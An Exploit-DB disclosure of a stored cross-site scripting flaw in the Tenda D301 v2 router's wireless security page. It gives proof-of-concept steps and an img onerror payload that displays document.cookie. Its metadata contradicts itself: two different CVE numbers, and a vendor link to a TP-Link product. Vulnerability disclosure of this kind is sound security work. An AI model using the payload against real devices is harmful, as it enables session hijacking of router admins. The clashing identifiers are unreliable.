Tenda D301 v2 Modem Router - Persistent Cross-Site Scripting

EDB-ID:

47107


Author:

ABDO10

Type:

webapps


Platform:

Hardware

Date:

2019-07-12


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: tenda D301 v2 modem router stored xss CVE-2019-13492
# Exploit Author: ABDO10
# Date : July, 11th 2019
# Product : Tenda D301 v2  Modem Router
# version : v2
# Vendor Homepage: https://www.tp-link.com/au/home-networking/dsl-modem-router/td-w8960n/
# Tested on: Linux
# CVE : 2019-13491


# Poc Instructions :
/*******************************************************************************************************************/
> 1 - Open modem router  on web browser default(192.168.1.1)
> 2 - Click on advanced -> Wireless -> Security
> 3 - fill this payload : <img src="xy" OnError=prompt(document.cookie)>  as password
> 4 - Click on "click to display"
/*******************************************************************************************************************/